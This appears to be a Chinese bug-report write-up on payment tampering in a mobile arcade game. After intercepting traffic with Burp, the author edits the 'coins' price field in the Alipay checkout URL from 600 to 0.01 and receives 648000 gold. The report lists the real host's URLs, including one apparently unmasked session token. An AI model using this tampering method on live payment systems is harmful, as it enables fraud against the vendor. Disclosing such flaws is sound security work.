前奏,发现appstore搜索排行榜有个街机游戏机~然后就下载下来玩玩,
第一次登录,送了2k金币。。好少,啥都不玩的。里面有个抓娃娃。。。玩玩看,头几次抓到了,后面打死也抓不到,尼玛,怒了。


话说这个问题到底算是支付宝的还是游戏的?还是都有份?

PS:如此循环可以快速发家致富,走向人生巅峰,迎娶白富美,出任CEO
PPS:图多,手残党请自爱
PPPS:是不是标题长就可以让重视。

开启burp抓包~

点击买币的时候抓到个包

连接如下



?
1
http://lobby.dreambrother.cn:9090/lobby/gold/trade?sn=8bf997e6f86b920b64c68d424cd0f750c8*********************&ln=1&cl=2&ch=apple_yu_center&nu=20&fm=0

ok,目测觉得sn这个参数是本地用户名神马的,类似序列号一样的玩意,判断身份的~

QQ20150304-1@2x.png

QQ20150304-1@2x.png

恩,然后我就点击支付宝->648000金币

QQ20150304-2@2x.png

QQ20150304-2@2x.png

然后调到了这个页面

http://lobby.dreambrother.cn:9090/gold/trade/alipay /page?sn=8bf997e6f86b920b64c68d424cd0f750c8**********************& orderId=a9c3ae40ecba5bf65764146***********&coins=600.0&subject=金 币充值-数量648000&comment=金币可以通过好运来游乐场玩游戏使用

QQ20150304-3@2x.png

QQ20150304-3@2x.png

sn=判断用户身份信息



orderId=订单号





coins=钱





对,你没看错,,就是钱。。

600.0

600块。。我100块都不给你,更别说600块了

改为0.01

恩,就出现下面这样的样子

http://lobby.dreambrother.cn:9090/gold/trade/alipay /page?sn=8bf997e6f86b920b64c68d424cd0f750c8379164db3d4983& orderId=a9c3ae40ecba5bf65764146159d4280b&coins=0.001&subject=金币充 值-数量648000&comment=金币可以通过好运来游乐场玩游戏使用

QQ20150304-4@2x.png

QQ20150304-4@2x.png

恩,然后他就成了0.01了~

ok,去付款

QQ20150304-5@2x.png

QQ20150304-5@2x.png

D2E79AB5-C19A-4F4D-961C-F6592D1C1D48.png

D2E79AB5-C19A-4F4D-961C-F6592D1C1D48.png

QQ20150304-6@2x.png

QQ20150304-6@2x.png

6AB72AEF1AD2C7A4423769B56851E12E.png

6AB72AEF1AD2C7A4423769B56851E12E.png

637C9978FE7EBA6937948E3028C550F5.png

637C9978FE7EBA6937948E3028C550F5.png

677A407B649064DBE8194EA7FD962787.png

677A407B649064DBE8194EA7FD962787.png

FC226E2FCF0D12F176AB8762E8C7F548.png

FC226E2FCF0D12F176AB8762E8C7F548.png

CA99E072CB8C94BD62678C30E1A7061B.jpeg

CA99E072CB8C94BD62678C30E1A7061B.jpeg

QQ20150304-7@2x.png

QQ20150304-7@2x.png

QQ20150304-8@2x.png

QQ20150304-8@2x.png



解决方案:


。。api接口的问题吧,你说是支付宝的问题呢,还是你们游戏的问题呢 =~=